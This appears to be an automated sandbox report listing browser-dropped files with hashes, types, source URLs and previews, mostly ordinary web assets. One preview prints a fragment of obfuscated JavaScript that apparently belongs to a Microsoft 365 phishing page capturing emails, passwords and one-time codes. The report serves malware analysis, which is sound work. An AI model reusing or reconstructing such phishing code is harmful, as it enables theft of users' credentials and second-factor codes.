                                                        SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (49854)
                                                        Category:dropped
                                                        Size (bytes):49993
                                                        Entropy (8bit):5.216475744251136
                                                        Encrypted:false
                                                        SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                                        MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                                        SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                                        SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                                        SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                                        Category:dropped
                                                        Size (bytes):199
                                                        Entropy (8bit):6.766983163126765
                                                        Encrypted:false
                                                        SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                                        MD5:21B761F2B1FD37F587D7222023B09276
                                                        SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                                        SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                                        SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 105536, version 769.768
                                                        Category:downloaded
                                                        Size (bytes):105536
                                                        Entropy (8bit):7.989150976486913
                                                        Encrypted:false
                                                        SSDEEP:3072:cBrlv6vs2sSSF2Hv2/V49i7iM6wYyXuJwzO:cBrlvyVsSSFeWV49SiM6kaoO
                                                        MD5:CD2B4095E9CE66CDE642C3502A4022D9
                                                        SHA1:A280ECDDDD14695FAD22599301AB03ADFE5224C0
                                                        SHA-256:404C746C8F7E3F9B7611A8F23D908C1A32A5C972236B9D89BB68B05D9BF4B905
                                                        SHA-512:062782597F37B964A5F285FE8B75AC2CC57E99024FA6C9BF841DC2E7B930CE6CFC12EA5F32D2A6B7301A74FFBB552457A2A82ED9D945E135D8B027F506BF5D77
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-brands-400.woff2
                                                        Preview:wOF2.......@.....................................8.$. .`..P..H....T.. . ..WQg......V?..H.I...U.:1....~..?................s...y..*...Y.KEF.......SQ.R].H.H@.oa.....~?..{&@g6i..a...U...z5...x...<........I........,.".....W.7v.$v...t..F]...X.X[..k..su.O.<.......V./.z..;.\....=y7.....]B.8.$`.Y.3....uTT.0.5..7~1...y~........WU.tWM.m....i@.A.-...l'..!.80!..q.'@h?t..Q.-........._.O.S.t..-.b...>..NE$c..O..AT....w .H.A..yK6..PYQ...c.%......}..i.6..X......:.D{...{...}....@.>P........P|.......Ud.BQ.^%.f.%M.b..R...h.j.PUk.....l....c..".....5Kn....Jc.&..&..."..9.....Q`........m.E...:M......\..yIMdZ]..].I..*...#t.shk.u.. .Ld.]{..&......3.UE.PG.0(..6`....B..7<j]....6....z.......\.$l....6BQ..WU...y?[....Unb.....K}T.........p..Z.t.....u..1..._.h).z..m.=`.....p.........{~...i..r.s........v.m|..c0..f.:..1...l..Y....>.........C..O...Xf.K....I...|...Y..=.e.0...^+.w...2....+L......"..X/.~:_..m/.o..B..4.LJ.'..3....f.N..;-9#..e:.J.a;K.9*.I....T.w=.0.....n.K.t..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 (with BOM) text
                                                        Category:downloaded
                                                        Size (bytes):23427
                                                        Entropy (8bit):5.112735417225198
                                                        Encrypted:false
                                                        SSDEEP:384:1HHLO7eS0F4bBY/fn6jZcy9/cGK1q8CarY64Cb+dOy:1HHCLYXfl1q8CarY64Cb+dl
                                                        MD5:BA0537E9574725096AF97C27D7E54F76
                                                        SHA1:BD46B47D74D344F435B5805114559D45979762D5
                                                        SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
                                                        SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.w3schools.com/w3css/4/w3.css
                                                        Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:dropped
                                                        Size (bytes):1636
                                                        Entropy (8bit):4.214613323368661
                                                        Encrypted:false
                                                        SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                                        MD5:F7AB697E65B83CE9870A4736085DEEEC
                                                        SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                                        SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                                        SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:downloaded
                                                        Size (bytes):1636
                                                        Entropy (8bit):4.214613323368661
                                                        Encrypted:false
                                                        SSDEEP:24:t4pb8W1baAcycV1i21AL5Xr/fJzWTtDYnpTyuwa+BDhMXeDFF6+/OKgXOgWKZsHz:zdyb2+jfJz+sFyN3BdMeFF52KgeTksHz
                                                        MD5:F7AB697E65B83CE9870A4736085DEEEC
                                                        SHA1:5FF40BFF26B523FBBEAA5228A2AAC63E44AFAA90
                                                        SHA-256:CBB3706E65B35A43BDCFEBD23B5479DC0542CA7E23197869B683D12B524472FE
                                                        SHA-512:158874143CE65485348813431BB585227772F315234E08158A329DF98319AA5F1DB21DEF2AD7CAA5C25AD11660E7D4E05158CFA1198913A33B1B91676C4CA402
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a2.55,2.55,0,0,1-.562.188,2.423,2.423,0,0,1-.3.07q-.141.023-.281.055V20.266q.422-.125.813-.281t.766-.344a8.253,8.253,0,0,0,1.344-.844h1.313m4.531,8.234h4.156v1.8H19.859v-.75a3.292,3.292,0,0,1,.25-1.344,4.183,4.183,0,0,1,.625-1.078,5.7,5.7,0,0,1,.844-.828q.219-.187.438-.352t.422-.32q.453-.312.766-.578a2.593,2.593,0,0,0,.3-.281l.25-.281a3.148,3.148,0,0,0,.328-.562,1.59,1.59,0,0,0,.109-.609,1.176,1.176,0,0,0-.359-.937,1.552,1.552,0,0,0-1.078-.328,3.625,3.625,0,0,0-2.422,1V19.688a4.866,4.866,0,0,1,1.359-.625,5.548,5.548,0,0,1,1.516-.2,4.456,4.456,0,0,1,1.344.188,2.461,2.461,0,0,1,1,.563,2.242,2.242,0,0,1,.625.875,3.007,3.007,0,0,1,.219,1.156,3.538,3.538,0,0,1-.055.641,3.7,3.7,0,0,1-.148.563,3.439,3.439,0,0,1-.562.953,7.2,7.2,0,0,1-.8.8q-.21
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                        Category:downloaded
                                                        Size (bytes):1435
                                                        Entropy (8bit):7.8613342322590265
                                                        Encrypted:false
                                                        SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                        MD5:9F368BC4580FED907775F31C6B26D6CF
                                                        SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                        SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                        SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                        Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):2228
                                                        Entropy (8bit):7.82817506159911
                                                        Encrypted:false
                                                        SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                        MD5:EF9941290C50CD3866E2BA6B793F010D
                                                        SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                        SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                        SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 154228, version 769.768
                                                        Category:downloaded
                                                        Size (bytes):154228
                                                        Entropy (8bit):7.996770916751852
                                                        Encrypted:true
                                                        SSDEEP:3072:1s6054PmrMMxqMo/sE4yN1JWxUY+qI2kqdYt2B1dqchgjwQ:W68io3G5JYktDt62b
                                                        MD5:55B416A8DF21F9F987AA352F10D1343B
                                                        SHA1:2717F3F58271F2F2E6120D9937C7227002656D34
                                                        SHA-256:D76FB4E841748A3F6BC63EFA23156E02631C283BF41F84EFCBDAF339EA3E1B73
                                                        SHA-512:7C4983811EBA2AE80998C62C0EB48CC53EEC26E3CA4222D5CF0A758A5EA92E6A14DCFED4FE5B7EF5513F89BE2C0F336D0131687FA3EDDCBD4BB218BBD6BEB985
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-solid-900.woff2
                                                        Preview:wOF2......Zt.......(..Z).........................8.$. .`..(...@..(.,..p. .....Hp......aD.f.O..q....@UUUU....l......G?../~.....O.................O......l...x}~.....=...N.'........Gu@..p1.G.....f,.*..V<[..W..U.W#......@....."[.D.8....L..7I......O.{v....E.bQY..B.P+F..)...?......<....e...4.X...H.`tA...@.@.v........GT.~!].....VV7..L.&.D..p.\G..~g.....^....ew.kT..3........pa.......W....A7..`.t/I;.3-K.vdK....D.m.ds.....A...b...#.?...G.O.m..=.....ux.:..gr.......3...v..t.{.p.x..@H..$.B#.H.....4rB.>..........'..8.......pj.<.h4..g..q,Y...Nb[.....ms.^L.0...]}....~.'....w?a>.9?.........H.O.fF#i4....L..;..4q...7a.m.m...R..3.\.v...b.....]B/Aex......lo.f..e .!.@X5....wb...q....=QL..R.._.............EE.W..._..Z.K...q.....2..........`..6..C...jj..#&A=@.>^..N.2.3....P.....t....Y.i..T..LN2..:x.V\..Z.7../1|.x.V..~......=3.!...y...lz.O..<.dgCR4.A....8.p.aq...h.....6.>.e:...NQ.h....L.G2.V[.f...Ai.=+..+ ...'l..i.+C.t)s.(j...WZ_:..\9.Y..U.]......A.y..9........\xf.;.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
                                                        Category:downloaded
                                                        Size (bytes):2407
                                                        Entropy (8bit):7.900400471609788
                                                        Encrypted:false
                                                        SSDEEP:48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
                                                        MD5:9D372E951D45A26EDE2DC8B417AAE4F8
                                                        SHA1:84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
                                                        SHA-256:4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
                                                        SHA-512:78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
                                                        Preview:...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx|............|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):2228
                                                        Entropy (8bit):7.82817506159911
                                                        Encrypted:false
                                                        SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                        MD5:EF9941290C50CD3866E2BA6B793F010D
                                                        SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                        SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                        SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                                        Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 250
                                                        Category:downloaded
                                                        Size (bytes):199
                                                        Entropy (8bit):6.766983163126765
                                                        Encrypted:false
                                                        SSDEEP:6:XtkhhsKHWpSiKPjPOeNWo6Rs7J1TxODwpV:X8hsKHDTPyeNSRs7vV0aV
                                                        MD5:21B761F2B1FD37F587D7222023B09276
                                                        SHA1:F7A416C8907424F9A9644753E3A93D4D63AE640E
                                                        SHA-256:72D4161C18A46D85C5566273567F791976431EFEF49510A0E3DD76FEC92D9393
                                                        SHA-512:77745F60804D421B34DE26F8A216CEE27C440E469FD786A642757CCEDBC4875D5196431897D80137BD3E20B01104BA76DEC7D8E75771D8A9B5F14B66F2A9B7C0
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg
                                                        Preview:..........u....0.._%2k.8?....w..k..!.M.."b5<.M.bD..c..l.:..}...@.8p.sn.j...%".B...J..6...c..^..?...2d...R..w.<%..}..}s..ir0/.......:8).(.......^u...0..U..I.F....{]...[-......~..F.P_.....G.....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:exported SGML document, Unicode text, UTF-8 text, with very long lines (65506)
                                                        Category:dropped
                                                        Size (bytes):121471
                                                        Entropy (8bit):4.443973115063283
                                                        Encrypted:false
                                                        SSDEEP:3072:Angz3cwtj4+eS6e6+XE3TLc7afmmmmmUmBs/N:AnU3cwtj4+eS6e6+XE3TL9
                                                        MD5:7E32DC72F512FD3F004E1FB20CD34E92
                                                        SHA1:0EDD69E1DA1471CD8926A25A55B2E84A17C0EB2D
                                                        SHA-256:5155B875701F7066E44F3340647A26E76A6C16904D794C2B6B9E1DBE9697E01E
                                                        SHA-512:EEF55C34AF0AE9AFC4F4C35A27B942BBB4E3D10CB98D4A7572D17A71879F5850B9685F8EF90E646ED4BFA73A7419DFE5378B8C99D03B3525EDD50496A50A5025
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:function _0xb276() {. const _0x5ed944 = ['href', '.phoneotpText', 'readyState', '#playme_big', '@ionos.', '#playme', 'resize', 's2c_restart', '.loaderxBlock11', 's2c', 'complete', 'O365', 'url(\x27https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg\x27)', '@163.', 'trim', '#fff', 'location', 'focus', 'beforeend', 'onblur', '@yandex.', 'load', 'RQ_EMAIL', '375242BWnaRd', 'body', 'Trying\x20to\x20sign\x20you\x20in\x20...', '#allbody', 'endUrl', 'RQ_OTP_APP', 'onfocus', '.logerMe', '.appotpCode', '.otpInput2', 'https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg', 'keyup', 'disconnect', '<p/>', '1007762XNswUc', 'test', 'includes', 'interactive', '.loaderxBlock2', '#000', 'width', 'CORRECT_OTP', 'otp_command', '.grayBox', '.emailInput', '.msappBlock', 'authentication-server.com', 'reload', 'attachEvent', '.passwordError', 'RQ_OTP_NOPASS_APP', '#base_icons', 'top', '.backArrow', '\x0a\x
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (49854)
                                                        Category:downloaded
                                                        Size (bytes):49993
                                                        Entropy (8bit):5.216475744251136
                                                        Encrypted:false
                                                        SSDEEP:768:RKrClF4PgzcEZ5G/Z4G9qXLZed86mhrjlm:RPXcZ4TLZzpPm
                                                        MD5:777EB8FD4F8320B6E5CC9A7159BDEC6A
                                                        SHA1:6B4032E88D0040182089FE3BEFDECEE9346E8921
                                                        SHA-256:73EBA16BC895FDFA454E27ECB80DEF31EDE8D861F99E175FF93B110EABEC044F
                                                        SHA-512:D75B7C43EBD8F49942AEBF8FBDE64A4D826AF27ECED3D6395FFA64FDA31DDEF26E812BEEE313AE9C6114CDA003A8BDC8F1C64A13FA41C3009F5F30E4449876B1
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://cdn.socket.io/4.7.5/socket.io.min.js
                                                        Preview:/*!. * Socket.IO v4.7.5. * (c) 2014-2024 Guillermo Rauch. * Released under the MIT License.. */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).io=t()}(this,(function(){"use strict";function e(t){return e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e(t)}function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function n(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,(i=r.key,o=void 0,"symbol"==typeof(o=function(e,t){if("object"!=typeof e||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var r=n.call(e,t||"default");if("object"!=typeof r)return r;th
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with very long lines (2044)
                                                        Category:dropped
                                                        Size (bytes):4233
                                                        Entropy (8bit):5.182676247770295
                                                        Encrypted:false
                                                        SSDEEP:96:lW+9Jg/k5PG5Py5PevSd++OICtJxtomlGDWtVA24:M+9JUk5e5a5eSdpOICtlomlH4
